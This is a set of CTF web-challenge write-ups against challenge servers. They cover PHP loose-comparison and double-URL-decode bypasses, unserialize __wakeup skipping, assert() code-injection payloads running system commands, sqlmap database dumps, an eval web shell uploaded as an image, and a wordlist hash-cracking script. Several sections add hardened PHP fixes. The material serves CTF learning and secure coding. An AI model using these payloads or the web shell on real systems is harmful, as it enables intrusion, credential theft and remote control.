XCTF 4th-QCTF-2018
Scan: http://111.198.29.45:31877/.git/
Recovered the source with GitHack.
Then code audit:
The problem is here:
function buy($req){
    require_registered();
    require_min_money(2);
    $money = $_SESSION['money'];
    $numbers = $req['numbers'];
    $win_numbers = random_win_nums();
    $same_count = 0;
    for($i=0; $i<7; $i++){
        if($numbers[$i] == $win_numbers[$i]){
            $same_count++;
        }
    }
    switch ($same_count) {
        case 2:
            $prize = 5;
            break;
        case 3:
            $prize = 20;
            break;
        case 4:
            $prize = 300;
            break;
        case 5:
            $prize = 1800;
            break;
        case 6:
            $prize = 200000;
            break;
        case 7:
            $prize = 5000000;
            break;
        default:
            $prize = 0;
            break;
    }
    $money += $prize - 2;
    $_SESSION['money'] = $money;
    response(['status'=>'ok','numbers'=>$numbers, 'win_numbers'=>$win_numbers, 'money'=>$money, 'prize'=>$prize]);
}
Send the request as JSON instead, so each number becomes a boolean and the loose comparison (==) matches every digit:
{"action":"buy","numbers":[true,true,true,true,true,true,true]}
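Why the boolean payload scores seven matches, and how a strict buy() would reject it. This is an added example, not the challenge's code: the winning numbers are a constructed sample and the helper names are mine; the original random_win_nums() is not called.

```php
<?php
// Added example (not from the challenge). Winning numbers are a constructed
// sample; note that a winning digit "0" would NOT match true, because "0" is
// falsy in PHP (true == "0" is false), so all-true is not guaranteed to hit 7.
$win_numbers = "3182947";

// Same loop as the challenge's buy(): loose == comparison.
function count_matches($numbers, string $win_numbers): int {
    $same = 0;
    for ($i = 0; $i < 7; $i++) {
        if ($numbers[$i] == $win_numbers[$i]) {   // true == "3" is true in PHP
            $same++;
        }
    }
    return $same;
}

// Hardened version: accept only an array of exactly seven single-digit
// strings and compare with ===, so booleans and integers never match.
function count_matches_strict($numbers, string $win_numbers): int {
    if (!is_array($numbers) || count($numbers) !== 7) {
        return 0;
    }
    $same = 0;
    for ($i = 0; $i < 7; $i++) {
        $n = $numbers[$i] ?? null;
        if (!is_string($n) || strlen($n) !== 1 || !ctype_digit($n)) {
            return 0;   // reject true/false, ints and multi-character strings
        }
        if ($n === $win_numbers[$i]) {
            $same++;
        }
    }
    return $same;
}

// The JSON payload from the write-up, decoded the way the server would.
$payload = json_decode('{"numbers":[true,true,true,true,true,true,true]}', true)['numbers'];
var_dump(count_matches($payload, $win_numbers));
var_dump(count_matches_strict($payload, $win_numbers));
```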
XCTF 4th-CyberEarth
A guessing challenge: just brute-force the id, e.g. index.php?id=2333
tinyctf-2014
Download the attachment and rename it to an .html file.
Opening it runs a piece of JS.
Change eval to alert:
<script>_='function $(){e=getEleById("c").value;length==16^be0f23233ace98aa$c7be9){tfls_aie}na_h0lnrg{e_0iit\'_ns=[t,n,r,i];for(o=0;o<13;++o){ [0]);.splice(0,1)}}} \'<input id="c">< onclick=$()>Ok</>\');delete _var ","docu.)match(/"];/)!=null=[" write(s[o%4]buttonif(e.ment';for(Y in $=' ')with(_.split($[Y]))_=join(pop());eval(_)</script>
which reveals the following function:
function $() {
    var e = document.getElementById("c").value;
    if (e.length == 16) if (e.match(/^be0f23/) != null) if (e.match(/233ac/) != null) if (e.match(/e98aa$/) != null) if (e.match(/c7be9/) != null) {
        var t = ["fl", "s_a", "i", "e}"];
        var n = ["a", "_h0l", "n"];
        var r = ["g{", "e", "_0"];
        var i = ["it'", "_", "n"];
        var s = [t, n, r, i];
        for (var o = 0; o < 13; ++o) {
            document.write(s[o % 4][0]);
            s[o % 4].splice(0, 1)
        }
    }
}
document.write('<input id="c"><button onclick=$()>Ok</button>');
delete _
Construct a 16-character string that matches all four regexes, be0f233ac7be98aa, enter it and the page writes out the flag.
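The same check and document.write() loop re-implemented in PHP, so the constructed input can be validated and the flag recovered offline without a browser. Added example, not part of the original write-up; check_input() and build_flag() are my names.

```php
<?php
// Added example (not from the challenge): PHP port of the deobfuscated JS.
function check_input(string $e): bool {
    // Same five conditions as the JS: length 16 and the four regexes.
    return strlen($e) === 16
        && preg_match('/^be0f23/', $e) === 1
        && preg_match('/233ac/', $e) === 1
        && preg_match('/e98aa$/', $e) === 1
        && preg_match('/c7be9/', $e) === 1;
}

function build_flag(): string {
    $t = ["fl", "s_a", "i", "e}"];
    $n = ["a", "_h0l", "n"];
    $r = ["g{", "e", "_0"];
    $i = ["it'", "_", "n"];
    $s = [$t, $n, $r, $i];
    $out = '';
    // 13 rounds, cycling over the four arrays and consuming the head of each
    // (array_shift is the equivalent of splice(0, 1) + taking element [0]).
    for ($o = 0; $o < 13; ++$o) {
        $out .= array_shift($s[$o % 4]);
    }
    return $out;
}

$candidate = 'be0f233ac7be98aa';
if (check_input($candidate)) {
    echo build_flag(), "\n";
} else {
    echo "input rejected\n";
}
```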
XCTF 4th-QCTF-2018
<?php
class xctf{
    public $flag = '111';
    public function __wakeup(){
        print "fangzhang";
    }
}
$a = new xctf();
$a->flag = '111';
print serialize($a);
?>
O:4:"xctf":1:{s:4:"flag";s:3:"111";}
O:4:"xctf":2:{s:4:"flag";s:3:"111";}
The __wakeup() bypass depends on the object's property count: if the number in the serialized string that declares the property count equals the real number of properties, __wakeup() is called; if that number is greater than the real property count, __wakeup() is skipped.
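The two serialized strings above fed through unserialize(), and the defensive option that keeps attacker-supplied data from instantiating any class in the first place. Added example, not the challenge's code; the "patched build" behaviour described in the comments applies to PHP releases that fixed this bug.

```php
<?php
// Added example (not from the challenge).
class xctf {
    public $flag = '111';
    public function __wakeup() {
        print "fangzhang\n";
    }
}

$matching = 'O:4:"xctf":1:{s:4:"flag";s:3:"111";}';  // declared count 1 == real count 1
$mismatch = 'O:4:"xctf":2:{s:4:"flag";s:3:"111";}';  // declared count 2 >  real count 1

// Declared count matches: the object is rebuilt and __wakeup() runs.
var_dump(unserialize($matching));

// Declared count too large: on affected PHP builds the object is returned
// without __wakeup() ever running; patched builds treat the mismatch as a
// parse error and return false instead.
var_dump(unserialize($mismatch));

// Hardened: refuse every class. The payload is turned into
// __PHP_Incomplete_Class, so no magic method of xctf (__wakeup, __destruct,
// ...) can be triggered by the input, whatever count it declares.
$safe = unserialize($matching, ['allowed_classes' => false]);
var_dump($safe instanceof __PHP_Incomplete_Class);
```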
csaw-ctf-2016-quals
Git leak; the following source was recovered:
<?php
if (isset($_GET['page'])) {
    $page = $_GET['page'];
} else {
    $page = "home";
}
$file = "templates/" . $page . ".php";
// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");
Code injection: $file is interpolated into a string that assert() evaluates as PHP, so a quote in page closes the string literal. Inject with the following payload:
' and die(show_source('templates/flag.php')) or '
Other payloads:
'.system("cd ../../../; ls -lA;").'about
'.system("cd /var/www/html/;git diff;").'about
'.system('ls -al;').'aaa
about.php', 'bogus') === false and system('cat templates/flag.php') and strpos('templates/flag
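How the same page selector looks without string-evaluating assert(): the user value is matched against a fixed allow-list before it is used to build a path, so neither '..' nor a quote ever reaches code. Added example, not from the challenge; the template names are assumed. (PHP 8 no longer evaluates string arguments to assert() at all, which removes this injection primitive but not the path issue.)

```php
<?php
// Added example (not from the challenge): hardened replacement for the
// assert()-based checks. Template names below are assumed.
$allowed = ['home', 'about', 'contact'];

$page = $_GET['page'] ?? 'home';

// Strict allow-list: the only way past this line is one of the fixed names,
// so "templates/$page.php" can never contain '..', quotes or a path separator.
if (!in_array($page, $allowed, true)) {
    http_response_code(404);
    die("That file doesn't exist!");
}

$file = "templates/" . $page . ".php";
if (!file_exists($file)) {            // plain function call, no string evaluation
    http_response_code(404);
    die("That file doesn't exist!");
}
include $file;
```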
XCTF 4th-QCTF-2018
sqlmap dumps it straight away.
A beginner-level SQL injection challenge:
sqlmap -r 1.txt --dbs
sqlmap -r 1.txt -D news --tables
sqlmap -r 1.txt -D news -T secret_table --dump
<?php
if("admin"===$_GET[id]) {
    echo("<p>not allowed!</p>");
    exit();
}
$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "admin")
{
    echo "<p>Access granted!</p>";
    echo "<p>Key: xxxxxxx </p>";
}
?>
Can you anthenticate to this website?
Double URL-encode "a" as %2561: the server decodes the query string once (giving %61dmin, which passes the strict check), then urldecode() turns it into admin:
http://111.198.29.45:40699/?id=%2561dmin
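The bypass reproduced with a fixed input, next to the ordering that closes it: canonicalise once, then run every check against that single value. Added example, not the challenge's code; vulnerable() and hardened() are my names.

```php
<?php
// Added example (not from the challenge). PHP has already URL-decoded $_GET
// once, so for ?id=%2561dmin the value the script actually sees is "%61dmin".
function vulnerable(string $id): bool {
    if ("admin" === $id) {        // deny check runs before decoding: "%61dmin" passes
        return false;
    }
    $id = urldecode($id);         // second decode turns "%61dmin" into "admin"
    return $id == "admin";        // grant check sees a different value than the deny check
}

function hardened(string $id): bool {
    $id = urldecode($id);         // canonicalise first ...
    if ("admin" === $id) {        // ... then deny and grant compare the same value
        return false;
    }
    return "admin" === $id;
}

$seen_by_server = "%61dmin";      // what arrives for ?id=%2561dmin
var_dump(vulnerable($seen_by_server));
var_dump(hardened($seen_by_server));
```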
Inspect element.
Change the upload button's attributes to get past the client-side check.
Then change the file extension in the upload request:
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg
<?php @eval($_POST['cmd'])?>
Then connect with Caidao (China Chopper).
Hack.lu-2017
Scan:
[16:17:28] 200 - 757B - /admin.php
[16:17:53] 200 - 1023B - /index.html
[16:17:56] 200 - 833B - /login.php
[16:18:06] 200 - 61B - /robots.txt
http://111.198.29.45:37868//login.php?debug
gives the source:
<?php
if(isset($_POST['usr']) && isset($_POST['pw'])){
    $user = $_POST['usr'];
    $pass = $_POST['pw'];
    $db = new SQLite3('../fancy.db');
    $res = $db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'");
    if($res){
        $row = $res->fetchArray();
    }
    else{
        echo "<br>Some Error occourred!";
    }
    if(isset($row['id'])){
        setcookie('name',' '.$row['name'], time() + 60, '/');
        header("Location: /");
        die();
    }
}
if(isset($_GET['debug']))
    highlight_file('login.php');
?>
No filtering at all: $user is concatenated straight into the query, so it can go directly into sqlmap,
which returns the following data:
+----+-------------------------------+--------+------------------------------------------+
| id | hint | name | password |
+----+-------------------------------+--------+------------------------------------------+
| 1 | my fav word in my fav paper?! | admin | 3fab54a50e770d830c0416df817567662a9dc85c |
| 2 | my love is'? | fritze | 54eae8935c90f467427f05e4ece82cf569f89507 |
| 3 | the password is password | hansi | 34b0bb7c304949f9ff2fc101eef0f048be10d3bd |
+----+-------------------------------+--------+------------------------------------------+
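The same lookup written with a bound parameter, so a quote in usr or pw is data rather than SQL. Added example, not the challenge's code; it uses a constructed in-memory database in place of ../fancy.db and keeps the site's sha1($pass."Salz!") scheme only so the comparison stays faithful (a per-user password_hash() would be the real fix, as the brute force below shows).

```php
<?php
// Added example (not from the challenge): parameterised version of the login query.
function find_user(SQLite3 $db, string $user, string $pass): ?array {
    $stmt = $db->prepare("SELECT id, name FROM Users WHERE name = :name AND password = :pw");
    $stmt->bindValue(':name', $user, SQLITE3_TEXT);
    // Same static-salt sha1 as the site, kept only to match the existing table;
    // password_hash()/password_verify() would make the dumped hashes uncrackable by wordlist.
    $stmt->bindValue(':pw', sha1($pass . "Salz!"), SQLITE3_TEXT);
    $row = $stmt->execute()->fetchArray(SQLITE3_ASSOC);
    return $row === false ? null : $row;
}

// Constructed in-memory stand-in for ../fancy.db with one sample user.
$db = new SQLite3(':memory:');
$db->exec("CREATE TABLE Users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)");
$db->exec("INSERT INTO Users (name, password) VALUES ('admin', '" . sha1('password' . 'Salz!') . "')");

// A quote in the user name no longer alters the statement; it is matched literally.
var_dump(find_user($db, "admin' or '1'='1", "x"));
var_dump(find_user($db, "admin", "password"));
```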
From the code, the stored password hash is computed as:
sha1($pass."Salz!")
admin's hint is "my fav word in my fav paper".
The plan: first crawl all the PDFs on the site,
then use the words from those PDFs as a wordlist to brute-force the hash.
Fetch the PDFs with the following script:
import os
import re
import requests

# PDF names are 32 hex characters + .pdf; sub-directories are linked as e.g. "1/index.html"
re1 = r'[a-fA-F0-9]{32}\.pdf'
re2 = r'[0-9/]{2}index\.html'
pdf_list = []
visited = set()

def get_pdf(url):
    """Recursively collect PDF URLs starting from a directory index page."""
    global pdf_list
    if url in visited:          # do not re-crawl a page (avoids infinite recursion on back-links)
        return pdf_list
    visited.add(url)
    print(url)
    req = requests.get(url).text
    for i in re.findall(re1, req):
        pdf_list.append(url + i)
    for j in re.findall(re2, req):
        get_pdf(url + j[0:2])   # j[0:2] is the sub-directory prefix, e.g. "1/"
    return pdf_list

pdf_list = get_pdf('http://111.198.29.45:37868/')
print(pdf_list)
# for i in pdf_list:
#     os.system('wget ' + i)
Start the brute force (every distinct word from every PDF, hashed the way the site does it):
import hashlib
import os
from io import StringIO

# pdfminer.six does the PDF text extraction (these imports were missing from the original script)
from pdfminer.converter import TextConverter
from pdfminer.layout import LAParams
from pdfminer.pdfinterp import PDFPageInterpreter, PDFResourceManager
from pdfminer.pdfpage import PDFPage

TARGET = '3fab54a50e770d830c0416df817567662a9dc85c'   # admin's hash from the dump

def get_pdf(dir):
    """Return the .pdf files in a directory (filter a copy instead of deleting while iterating)."""
    return [i for i in os.listdir(dir) if i[-4:] == '.pdf']

def get_word_list(path):
    """Extract the text of one PDF and return its distinct whitespace-separated words."""
    rsrcmgr = PDFResourceManager()
    retstr = StringIO()
    device = TextConverter(rsrcmgr, retstr, laparams=LAParams())
    interpreter = PDFPageInterpreter(rsrcmgr, device)
    with open(path, 'rb') as fp:
        for page in PDFPage.get_pages(fp, set()):
            interpreter.process_page(page)
    text = retstr.getvalue()
    device.close()
    retstr.close()
    return set(text.split())

def jiami(j):
    """Reproduce the site's hashing: sha1($pass . "Salz!")."""
    sha = hashlib.sha1((j + 'Salz!').encode('utf-8'))
    return sha.hexdigest()

pdf_list = get_pdf('./')
for i in pdf_list:
    word_list = get_word_list(i)
    for j in word_list:
        if jiami(j) == TARGET:
            print(i, j)          # PDF and the word that produced admin's hash
            raise SystemExit